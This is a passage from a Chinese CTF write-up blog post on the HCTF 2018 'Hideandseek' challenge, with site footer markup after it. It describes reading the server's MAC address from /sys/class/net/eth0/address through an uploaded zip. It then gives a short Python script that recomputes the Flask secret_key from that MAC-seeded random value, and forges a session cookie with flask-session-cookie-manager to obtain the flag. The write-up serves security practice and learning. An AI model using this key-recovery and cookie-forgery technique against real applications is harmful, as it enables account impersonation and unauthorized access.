<p>在开头的第9行哪里发现了secret_key，知道了他的生成方式，并且在第8行看到了伪随机种子，uuid.getnode(),发现这个是获取本机的mac地址并且转换为十进制返回。有查了可以再<strong>/sys/class/net/eth0/address</strong>文件哪里查看，那么生成zip压缩包上传获取到并且算出<strong>secret_key</strong>,脚本是晚上抄的：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> uuid</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"></span><br><span class="line">mac = <span class="string">"02:42:ae:01:8a:f9"</span></span><br><span class="line">temp = mac.split(<span class="string">':'</span>)</span><br><span class="line">temp = [int(i,<span class="number">16</span>) <span class="keyword">for</span> i <span class="keyword">in</span> temp]</span><br><span class="line">temp = [bin(i).replace(<span class="string">'0b'</span>,<span class="string">''</span>).zfill(<span class="number">8</span>) <span class="keyword">for</span> i <span class="keyword">in</span> temp]</span><br><span class="line">temp = <span class="string">''</span>.join(temp)</span><br><span class="line">mac = int(temp,<span class="number">2</span>)</span><br><span class="line">random.seed(mac)</span><br><span class="line">randStr = str(random.random()*<span class="number">100</span>)</span><br><span class="line">print(randStr)</span><br></pre></td></tr></table></figure>

<p>获取到<strong>secret_key</strong>,用<strong>flask-session-cookie-manager</strong>工具进行生成，替换cookie得到flag</p>
<p>参考链接：</p>
<ol>
<li><a href="https://blog.csdn.net/weixin_39386145/article/details/104648423" target="_blank" rel="noopener">https://blog.csdn.net/weixin_39386145/article/details/104648423</a></li>
<li><a href="https://www.jianshu.com/p/d20168da7284" target="_blank" rel="noopener">https://www.jianshu.com/p/d20168da7284</a></li>
<li><a href="https://www.cnblogs.com/DswCnblog/p/5780389.html" target="_blank" rel="noopener">https://www.cnblogs.com/DswCnblog/p/5780389.html</a></li>
</ol>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">主页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">文章</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/tools/">工具</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00-HCTF-2018"><span class="toc-number">1.</span> <span class="toc-text">0x00:[HCTF 2018]</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-WarmUp"><span class="toc-number">1.1.</span> <span class="toc-text">0x00:WarmUp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-Hideandseek"><span class="toc-number">1.2.</span> <span class="toc-text">0x01:Hideandseek</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&text=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&title=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&is_video=false&description=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=buuctf闯关记录-web篇&body=Check out this article: http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&title=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&title=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&title=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&title=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&name=buuctf闯关记录-web篇&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://yoursite.com/2020/05/19/buuctf%E9%97%AF%E5%85%B3%E8%AE%B0%E5%BD%95-web%E7%AF%87/&t=buuctf闯关记录-web篇" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2019-2020
    bai191
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">主页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">文章</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/tools/">工具</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
